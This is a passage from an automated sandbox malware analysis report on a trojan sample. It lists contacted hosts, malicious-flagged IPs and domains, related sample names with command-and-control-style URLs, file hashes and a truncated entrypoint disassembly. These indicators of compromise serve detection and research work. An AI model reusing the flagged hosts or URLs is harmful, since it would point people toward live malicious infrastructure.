                                                                        http://www.galapagosdesign.com/DPlease8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://www.gnu.org8sxgohtHjM.exefalse
                                                                          high
                                                                          http://www.fontbureau.com/designers88sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpfalse
                                                                            high
                                                                            http://www.fonts.com8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpfalse
                                                                              high
                                                                              http://www.sandoll.co.kr8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.urwpp.deDPlease8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.zhongyicts.com.cn8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name8sxgohtHjM.exe, 00000000.00000002.270731871.0000000002701000.00000004.00000001.sdmp, 8sxgohtHjM.exe, 00000000.00000002.270751775.000000000271E000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://www.sakkal.com8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://www.newmandu.com/?fp=teRCGBRWnsMyQPYBLQzITP%2FRZhRM%2BzRVkHY6lKODoxW9UBFBZ%2BAUTjJBDU4IosgaQpNETSTAT.EXE, 00000010.00000002.522730869.00000000041A2000.00000004.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown

                                                                                Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                108.128.238.226
                                                                                cname.landingi.comUnited States
                                                                                16509AMAZON-02USfalse
                                                                                208.91.197.91
                                                                                www.newmandu.comVirgin Islands (BRITISH)
                                                                                40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                34.102.136.180
                                                                                nfoptic.comUnited States
                                                                                15169GOOGLEUSfalse
                                                                                91.121.60.23
                                                                                www.support-applela.comFrance
                                                                                16276OVHFRtrue
                                                                                3.13.255.157
                                                                                prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comUnited States
                                                                                16509AMAZON-02USfalse
                                                                                152.44.33.193
                                                                                bestwishesforyou.onlineUnited States
                                                                                25697UPCLOUDUSAUStrue

                                                                                General Information

                                                                                Joe Sandbox Version:31.0.0 Emerald
                                                                                Analysis ID:383831
                                                                                Start date:08.04.2021
                                                                                Start time:10:46:51
                                                                                Joe Sandbox Product:CloudBasic
                                                                                Overall analysis duration:0h 11m 28s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:light
                                                                                Sample file name:8sxgohtHjM.exe
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                Number of analysed new started processes analysed:26
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:1
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • HDC enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.evad.winEXE@6/1@14/6
                                                                                EGA Information:Failed
                                                                                HDC Information:
                                                                                • Successful, ratio: 10.1% (good quality ratio 9%)
                                                                                • Quality average: 71.2%
                                                                                • Quality standard deviation: 32.8%
                                                                                HCA Information:
                                                                                • Successful, ratio: 99%
                                                                                • Number of executed functions: 0
                                                                                • Number of non-executed functions: 0
                                                                                Cookbook Comments:
                                                                                • Adjust boot time
                                                                                • Enable AMSI
                                                                                • Found application associated with file extension: .exe
                                                                                Warnings:
                                                                                Show All
                                                                                • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                • Excluded IPs from analysis (whitelisted): 52.255.188.83, 104.43.139.144, 40.88.32.150, 52.147.198.201, 104.42.151.234, 95.100.54.203, 104.43.193.48, 20.50.102.62, 23.10.249.26, 23.10.249.43, 20.54.26.129, 20.82.210.154
                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, arc.msn.com.nsatc.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus15.cloudapp.net, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net
                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                TimeTypeDescription
                                                                                10:48:09API Interceptor1x Sleep call for process: 8sxgohtHjM.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                108.128.238.226Product list.xlsxGet hashmaliciousBrowse
                                                                                • www.nahomredda.com/vu9b/?-ZltiVX8=epJyvIJI9JiM25XxlHYNHIQUuRpQuBcV3x7z0YVm2VKdY8i8RMGt7B8USEKAGss1/JaaiQ==&RfR4I=JR-06F20O6g
                                                                                WaybillDoc_6848889025.xlsxGet hashmaliciousBrowse
                                                                                • www.sharonrebucas.com/zn7/?Onm8=SDduXp1o7dE71Da9+0V04ZtckfdfPP4tr6m4xYquXCp64QmrI4GriJ50Xm5wysiJ8nfb8g==&MtApfP=GPB8rNApHF1D
                                                                                208.91.197.91PRC-20-518 ORIGINAL.xlsxGet hashmaliciousBrowse
                                                                                • www.chitrakaah.com/g050/?MBN0yn=gh6gYfQCrnQBnQvKqXR1BBdq6I0/ia6nXcyoJzz4U03ljs0U8DV8qCnN3+fv2J4IGdTu1A==&2dht=XHE0Qdm
                                                                                ORIGINAL SHIPPING DOCUMENTSPDF.exeGet hashmaliciousBrowse
                                                                                • www.rajeshpaul.com/qqeq/?D8IxB=7nSpJtUpafTlT6&eb=my9HLCyGyTUI7ijeZNMt9rsHqU3anFReddNHkecDwv0iZCMXfCC6FueMusiXp9GGW0pUqn5axA==
                                                                                PO#7689.zip.exeGet hashmaliciousBrowse
                                                                                • www.greenlightsmokables.com/md5/?Jzu4_4C=zHBqlneB+dU0jWTqKpl7P0UhTg+HlH4MpY8JEipF1WP+CJ4l7o5pEqU4RJVuKm5urAdq&NrThfj=D48x
                                                                                products order pdf.exeGet hashmaliciousBrowse
                                                                                • www.tudeladirecto.com/nt8e/?wTX=EFNpsN9xNb-Dd&n4p=d5sTnujAaLwCHAV7Hkod4AGONRw1Ceya8p7QHyuAjU2hemaQC5CnvhOz2MROTqxwdpcV
                                                                                7Q5Er1TObp.exeGet hashmaliciousBrowse
                                                                                • www.newmandu.com/vu9b/?FTjl4F=gvDMKnL2DiygUqkLOW8equ0SBtiZsQsp9RF77GdE0oWtaZL2dcC9ipMcSo2LbyxlKRwH&vRDtx=khL0M89p_R8hBZa
                                                                                New Purchase Order.exeGet hashmaliciousBrowse
                                                                                • www.fairview.global/noi6/?Ktklc=djQtGmR2ozp5r2jxyahjtN1TJLTs4NvNMxVFhpbWlLclFF8JTFJQ/pXyn76jfICi7GGZ&lzul=z8o4n2BhWV
                                                                                Bombermania.exeGet hashmaliciousBrowse
                                                                                • live.interballs.com/reporting_server/
                                                                                Bombermania.exeGet hashmaliciousBrowse
                                                                                • live.interballs.com/reporting_server/
                                                                                2021_03_16.exeGet hashmaliciousBrowse
                                                                                • www.ltc-gold.com/2bg/?lnud=/i/Ib+Dffob7lMQ5ivcx1VEzEzf2K5SYmZpCl/xPFCYFxY/A/vBZb7BF8LsLTj5bzBQKXYQmxg==&1bm=3fedQNQ0wlQl0H
                                                                                orii11.exeGet hashmaliciousBrowse
                                                                                • www.fotoincasa.com/mdi/?8pp=r1iONhcrP0pbpGclQVhVGgc+Q37F54QKHkqxX6oGe/sLqU52wzsf7IojbzpCHshmMIC4&sZCx=1bYdfPf8ef5pjPm
                                                                                bnb.exeGet hashmaliciousBrowse
                                                                                • www.fotoincasa.com/mdi/?Jh=r1iONhcrP0pbpGclQVhVGgc+Q37F54QKHkqxX6oGe/sLqU52wzsf7IojbzpoYcRmIKK4&njl0d=Rzuls4
                                                                                Purchase Order.exeGet hashmaliciousBrowse
                                                                                • www.fairview.global/noi6/?rXOp32I=djQtGmR2ozp5r2jxyahjtN1TJLTs4NvNMxVFhpbWlLclFF8JTFJQ/pXyn76JA4yi/EOZ&Bd4Dh=CX6p
                                                                                PO_98276300.exeGet hashmaliciousBrowse
                                                                                • www.ojaveda.com/ame8/?8p=TUdynzXewDV4R6hcP/TtpIkDjP+ZRmt16Hw3snKWLRaKzibVm3POi5J75QFaIAfkEyg3&Cb=hN98bjZH
                                                                                DHL_receipt.exeGet hashmaliciousBrowse
                                                                                • www.greenlightsmokable.com/s8gq/?GVTl=CdTDr&CtxLR=GcXO2IQJXedQXP0VXXtwOzFelwMaLaizNNb08pvp0e1v1F0rbo8J5l47qDnDSsA31Tvl
                                                                                QUOTATION00187612.exeGet hashmaliciousBrowse
                                                                                • www.gamingmag.online/nsk/?5juH1Lw=DnZ6smjvmKtwuwAXRixl0xHJiuXjV7QbSQXcUxw83NwxPjQzvt78aHwZY7I20FYugkDr&kxl0dL=nDH8a8R86Pb8o
                                                                                AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                                                                                • www.pathwaysnorman.com/idir/?jFNhC=QcfpPsZsTQkbfi9dIqkstDiu8gpji7zGKQT9CcYXB17rdgdInICGKPMkjk7u0mNGiAFDxGC1Zg==&PlHT0=_6g89p5H3xehg
                                                                                DHL Document. PDF.exeGet hashmaliciousBrowse
                                                                                • www.xpresssteamironing.com/d8ak/?Szr0s4=GfmXTYq2Yn2AckQWwnE6BBibtFv31Qjt2UWEfiHUUpW9PpEAUCSsafVf838QtlI0BZoH7o+vNw==&QL3=uTyTqJdh5XE07
                                                                                INV.xlsxGet hashmaliciousBrowse
                                                                                • www.h-v-biz.com/c8so/?cf=hsMrMOU/4wmWTnQK7BegBqlrTsujOywA7VbOIqdg4Ej/UmxkJ2Rbh4V4PlD+e7xk19hcsA==&nH4xu=erRXJfgPJ
                                                                                6tivtkKtQx.exeGet hashmaliciousBrowse
                                                                                • www.h-v-biz.com/c8so/?BZL0RN=hsMrMOU643mST3cG5BegBqlrTsujOywA7VDeUpBh8kj+UXdiOmAX38t6MDDBZrJv3dJ61wwARA==&3fPHK=w8O8gTXxNJq
                                                                                k5K4BcM1b5.exeGet hashmaliciousBrowse
                                                                                • www.athleteshive.com/gqx2/?NBtLW=kdwz49ReWeybRPZJolgC7QJtxuB/meiNTkYp+nGTjDB+7BQCfNz2YW0PX4LStuRlOVbvsJZwJw==&tTxX=Apm0n4
                                                                                91.121.60.23yQh96Jd6TZ.exeGet hashmaliciousBrowse
                                                                                  Product list.xlsxGet hashmaliciousBrowse

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comvbc.exeGet hashmaliciousBrowse
                                                                                    • 3.13.255.157
                                                                                    Order Inquiry.exeGet hashmaliciousBrowse
                                                                                    • 3.14.206.30
                                                                                    PaymentAdvice.exeGet hashmaliciousBrowse
                                                                                    • 3.14.206.30
                                                                                    BL01345678053567.exeGet hashmaliciousBrowse
                                                                                    • 3.14.206.30
                                                                                    Shipping Documents.xlsxGet hashmaliciousBrowse
                                                                                    • 3.14.206.30
                                                                                    TACA20210407.PDF.exeGet hashmaliciousBrowse
                                                                                    • 3.13.255.157
                                                                                    shipping documents.exeGet hashmaliciousBrowse
                                                                                    • 3.14.206.30
                                                                                    BL836477488575.exeGet hashmaliciousBrowse
                                                                                    • 3.13.255.157
                                                                                    Certrificate Confirmation.exeGet hashmaliciousBrowse
                                                                                    • 3.14.206.30
                                                                                    TT COPY.exeGet hashmaliciousBrowse
                                                                                    • 3.14.206.30
                                                                                    PaymentInvoice.exeGet hashmaliciousBrowse
                                                                                    • 3.13.255.157
                                                                                    Swift 76498,pdf.exeGet hashmaliciousBrowse
                                                                                    • 3.14.206.30
                                                                                    swift_76567643.exeGet hashmaliciousBrowse
                                                                                    • 52.15.160.167
                                                                                    BL COPY.exeGet hashmaliciousBrowse
                                                                                    • 52.15.160.167
                                                                                    MV WAF PASSION.exeGet hashmaliciousBrowse
                                                                                    • 3.131.252.17
                                                                                    CUFUYO.exeGet hashmaliciousBrowse
                                                                                    • 52.15.160.167
                                                                                    IMG_963394832387043.jpg.exeGet hashmaliciousBrowse
                                                                                    • 52.15.160.167
                                                                                    TNUiVpymgH.exeGet hashmaliciousBrowse
                                                                                    • 3.131.252.17
                                                                                    NEW ORDER.exeGet hashmaliciousBrowse
                                                                                    • 52.15.160.167
                                                                                    Lista de nuevos pedidos.exeGet hashmaliciousBrowse
                                                                                    • 52.15.160.167
                                                                                    cname.landingi.comyQh96Jd6TZ.exeGet hashmaliciousBrowse
                                                                                    • 54.77.19.84
                                                                                    Paymonth invoice.exeGet hashmaliciousBrowse
                                                                                    • 54.77.19.84
                                                                                    Product list.xlsxGet hashmaliciousBrowse
                                                                                    • 108.128.238.226
                                                                                    WaybillDoc_6848889025.xlsxGet hashmaliciousBrowse
                                                                                    • 108.128.238.226
                                                                                    quotation.exeGet hashmaliciousBrowse
                                                                                    • 52.212.68.12
                                                                                    qpFvMReV7S.exeGet hashmaliciousBrowse
                                                                                    • 108.128.238.226
                                                                                    900821.exeGet hashmaliciousBrowse
                                                                                    • 52.208.196.199
                                                                                    www.support-applela.comyQh96Jd6TZ.exeGet hashmaliciousBrowse
                                                                                    • 91.121.60.23
                                                                                    Product list.xlsxGet hashmaliciousBrowse
                                                                                    • 91.121.60.23
                                                                                    www.newmandu.com7Q5Er1TObp.exeGet hashmaliciousBrowse
                                                                                    • 208.91.197.91

                                                                                    ASN

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    CONFLUENCE-NETWORK-INCVGPO7321.exeGet hashmaliciousBrowse
                                                                                    • 208.91.197.39
                                                                                    PRC-20-518 ORIGINAL.xlsxGet hashmaliciousBrowse
                                                                                    • 208.91.197.39
                                                                                    Lista e porosive te blerjes.exeGet hashmaliciousBrowse
                                                                                    • 209.99.64.33
                                                                                    BL836477488575.exeGet hashmaliciousBrowse
                                                                                    • 204.11.56.48
                                                                                    BL84995005038483.exeGet hashmaliciousBrowse
                                                                                    • 204.11.56.48
                                                                                    DHL Shipping Documents.exeGet hashmaliciousBrowse
                                                                                    • 208.91.197.27
                                                                                    Formbook.exeGet hashmaliciousBrowse
                                                                                    • 204.11.56.48
                                                                                    ORIGINAL SHIPPING DOCUMENTSPDF.exeGet hashmaliciousBrowse
                                                                                    • 208.91.197.91
                                                                                    PDF NEW P.OJerhWEMSj4RnE4Z.exeGet hashmaliciousBrowse
                                                                                    • 208.91.197.27
                                                                                    bank details.exeGet hashmaliciousBrowse
                                                                                    • 208.91.197.27
                                                                                    PO#7689.zip.exeGet hashmaliciousBrowse
                                                                                    • 208.91.197.91
                                                                                    ORDER_PDF.exeGet hashmaliciousBrowse
                                                                                    • 209.99.64.18
                                                                                    deIt7iuD1y.exeGet hashmaliciousBrowse
                                                                                    • 204.11.56.48
                                                                                    Bista_094924,ppdf.exeGet hashmaliciousBrowse
                                                                                    • 208.91.197.27
                                                                                    PO_RFQ007899_PDF.exeGet hashmaliciousBrowse
                                                                                    • 209.99.64.55
                                                                                    PaymentInvoice.exeGet hashmaliciousBrowse
                                                                                    • 208.91.197.39
                                                                                    products order pdf.exeGet hashmaliciousBrowse
                                                                                    • 208.91.197.91
                                                                                    ZGNbR8E726.exeGet hashmaliciousBrowse
                                                                                    • 204.11.56.48
                                                                                    MV Sky Marine.xlsxGet hashmaliciousBrowse
                                                                                    • 204.11.56.48
                                                                                    DH7v8T4xFa.exeGet hashmaliciousBrowse
                                                                                    • 208.91.197.27
                                                                                    OVHFRC7SRTTLgsn.exeGet hashmaliciousBrowse
                                                                                    • 54.36.27.31
                                                                                    ApuE9QrdQxe7Um6.exeGet hashmaliciousBrowse
                                                                                    • 66.70.204.222
                                                                                    YReGeOs683XKMn4.exeGet hashmaliciousBrowse
                                                                                    • 51.195.53.221
                                                                                    LCSXS44U22.exeGet hashmaliciousBrowse
                                                                                    • 54.36.27.31
                                                                                    Ewkoo9igCN.dllGet hashmaliciousBrowse
                                                                                    • 51.91.76.89
                                                                                    49Bvnq7iFK.dllGet hashmaliciousBrowse
                                                                                    • 51.91.76.89
                                                                                    OtOXfybCmW.dllGet hashmaliciousBrowse
                                                                                    • 51.91.76.89
                                                                                    Ewkoo9igCN.dllGet hashmaliciousBrowse
                                                                                    • 51.91.76.89
                                                                                    W3aLwWHvWB.dllGet hashmaliciousBrowse
                                                                                    • 51.91.76.89
                                                                                    IJh1SAcSNP.dllGet hashmaliciousBrowse
                                                                                    • 51.91.76.89
                                                                                    OtOXfybCmW.dllGet hashmaliciousBrowse
                                                                                    • 51.91.76.89
                                                                                    afC9TbiOWl.dllGet hashmaliciousBrowse
                                                                                    • 51.91.76.89
                                                                                    wABiemJeyB.dllGet hashmaliciousBrowse
                                                                                    • 51.91.76.89
                                                                                    I316Yh2noM.dllGet hashmaliciousBrowse
                                                                                    • 51.91.76.89
                                                                                    W3aLwWHvWB.dllGet hashmaliciousBrowse
                                                                                    • 51.91.76.89
                                                                                    IJh1SAcSNP.dllGet hashmaliciousBrowse
                                                                                    • 51.91.76.89
                                                                                    afC9TbiOWl.dllGet hashmaliciousBrowse
                                                                                    • 51.91.76.89
                                                                                    9iJMZNQTad.dllGet hashmaliciousBrowse
                                                                                    • 51.91.76.89
                                                                                    wABiemJeyB.dllGet hashmaliciousBrowse
                                                                                    • 51.91.76.89
                                                                                    r4fUczb42h.dllGet hashmaliciousBrowse
                                                                                    • 51.91.76.89
                                                                                    AMAZON-02USeQLPRPErea.exeGet hashmaliciousBrowse
                                                                                    • 13.248.216.40
                                                                                    vbc.exeGet hashmaliciousBrowse
                                                                                    • 3.13.255.157
                                                                                    o2KKHvtb3c.exeGet hashmaliciousBrowse
                                                                                    • 18.218.104.192
                                                                                    Order Inquiry.exeGet hashmaliciousBrowse
                                                                                    • 3.14.206.30
                                                                                    6IGbftBsBg.exeGet hashmaliciousBrowse
                                                                                    • 104.192.141.1
                                                                                    nicoleta.fagaras-DHL_TRACKING_1394942.htmlGet hashmaliciousBrowse
                                                                                    • 52.218.213.96
                                                                                    PaymentAdvice.exeGet hashmaliciousBrowse
                                                                                    • 3.14.206.30
                                                                                    ikoAImKWvI.exeGet hashmaliciousBrowse
                                                                                    • 104.192.141.1
                                                                                    BL01345678053567.exeGet hashmaliciousBrowse
                                                                                    • 3.14.206.30
                                                                                    AL JUNEIDI LIST.xlsxGet hashmaliciousBrowse
                                                                                    • 65.0.168.152
                                                                                    DYANAMIC Inquiry.xlsxGet hashmaliciousBrowse
                                                                                    • 65.0.168.152
                                                                                    Statement of Account.xlsxGet hashmaliciousBrowse
                                                                                    • 15.165.26.252
                                                                                    Shipping Documents.xlsxGet hashmaliciousBrowse
                                                                                    • 52.217.8.51
                                                                                    bmws51TeIm.exeGet hashmaliciousBrowse
                                                                                    • 3.141.177.1
                                                                                    Receipt779G0D675432.htmlGet hashmaliciousBrowse
                                                                                    • 52.219.97.138
                                                                                    PaymentAdvice-copy.htmGet hashmaliciousBrowse
                                                                                    • 52.51.245.167
                                                                                    Documents_460000622_1464906353.xlsGet hashmaliciousBrowse
                                                                                    • 52.12.4.186
                                                                                    comprobante de pago bancario.exeGet hashmaliciousBrowse
                                                                                    • 44.227.76.166
                                                                                    TACA20210407.PDF.exeGet hashmaliciousBrowse
                                                                                    • 3.13.255.157
                                                                                    shipping documents.exeGet hashmaliciousBrowse
                                                                                    • 3.14.206.30

                                                                                    JA3 Fingerprints

                                                                                    No context

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\8sxgohtHjM.exe.log
                                                                                    Process:C:\Users\user\Desktop\8sxgohtHjM.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):1314
                                                                                    Entropy (8bit):5.350128552078965
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                                    MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                                    SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                                    SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                                    SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                                    Malicious:true
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Entropy (8bit):7.785317811577518
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                    • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                    File name:8sxgohtHjM.exe
                                                                                    File size:585728
                                                                                    MD5:d381b0a2268051aa83b031ddc87ee7df
                                                                                    SHA1:7c580bde96219de369ad1503d62703e77c4c3fa6
                                                                                    SHA256:da51c0642c1d22815991ec7f4da9f27206352ee2c5419d29af09cb69688b0b47
                                                                                    SHA512:d06241c1a89819b9961cdaf1be2f30af6e44cbca51d702d87a9c3d57453242d5f688119726a6d87e4ece8bff7e8eb91706a18181443a86665ddeb44323aaa4e5
                                                                                    SSDEEP:12288:YM7OsIVW7F3vllYIk9gkZsTSr6cTbjoN9xr249psBX:1OsAOliIVk9r6uwiX
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...VDn`..............P.............~.... ........@.. .......................`............@................................

                                                                                    File Icon

                                                                                    Icon Hash:00828e8e8686b000

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x49037e
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                    Time Stamp:0x606E4456 [Wed Apr 7 23:46:30 2021 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:v4.0.30319
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    jmp dword ptr [00402000h]
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
